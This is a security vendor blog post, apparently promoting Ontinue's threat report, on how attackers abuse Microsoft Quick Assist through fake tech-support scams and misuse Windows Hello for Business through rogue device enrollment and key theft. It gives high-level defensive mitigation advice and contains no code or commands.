Built-in Threats: How Cybercriminals Are Turning Microsoft Tools Into Attack Vectors

Cybercriminals are increasingly turning to the very tools enterprises trust to keep them productive and secure. Over the past six months, Ontinue’s Advanced Threat Operations (ATO) team has seen a spike in attacks that abuse built-in Microsoft Windows tools—especially Quick Assist and Windows Hello—to stealthily bypass defenses and infiltrate environments.

These attacks serve as a wake-up call: convenience can no longer outweigh security.

Quick Assist: When “Helpful” Becomes Harmful

Quick Assist is a legitimate Microsoft feature built into Windows systems that allows remote access for support personnel. But in the hands of threat actors, it becomes a powerful weapon.

Here’s how the attack chain often unfolds:

• Spam Bombing – Attackers flood the victim’s inbox or phone with junk messages to create confusion and urgency.
• Fake Tech Support – Victims are tricked into calling a fraudulent number on a spoofed “support” site.
• Quick Assist Exploitation – The scammer asks the victim to open Quick Assist and provide access using a session code.

From there, attackers can:

• Install malware and backdoors
• Maintain persistence
• Execute commands or install secondary payloads
• Steal data and credentials
• Disable security tools or even deploy ransomware

Mitigation Tips:

• Disable Quick Assist via Group Policy unless absolutely required.
• Monitor QuickAssist.exe usage for anomalies.
• Train users to never grant unsolicited remote access and verify support contacts.

Windows Hello: Passwordless, Not Riskless

Windows Hello—especially its enterprise variant, Windows Hello for Business (WHfB)—offers strong authentication via biometrics and PINs. It’s designed to be phishing-resistant. However, even this robust system isn’t immune to abuse.

Two key threat scenarios are emerging:

1. Rogue Device Enrollment
   • In misconfigured environments, attackers with valid user credentials can register unauthorized devices with WHfB, gaining persistent access.
2. Authentication Key Abuse
   • Attackers can target private keys stored in the Trusted Platform Module (TPM), especially in endpoints without proper protection, allowing them to bypass MFA.

Security Recommendations:

• Monitor WHfB device enrollments in Entra ID and Active Directory.
• Enforce conditional access policies and device compliance.
• Require TPM 2.0 and enable Credential Guard.
• Revoke compromised keys and devices promptly.
• Regularly audit sign-in activity for anomalies.

Rethinking Trust in Trusted Tools

The growing abuse of tools like Quick Assist and Windows Hello shows that attackers aren’t always looking for exotic exploits—they’re often exploiting convenience.

It’s time for security teams to take a hard look at the tools and applications considered “safe by default.” Because when convenience becomes a blind spot, it’s only a matter of time before it’s weaponized.

Learn more about these tactics and other rising threats in Ontinue’s latest 2H 2024 Threat Intelligence Report from our Advanced Threat Operations team.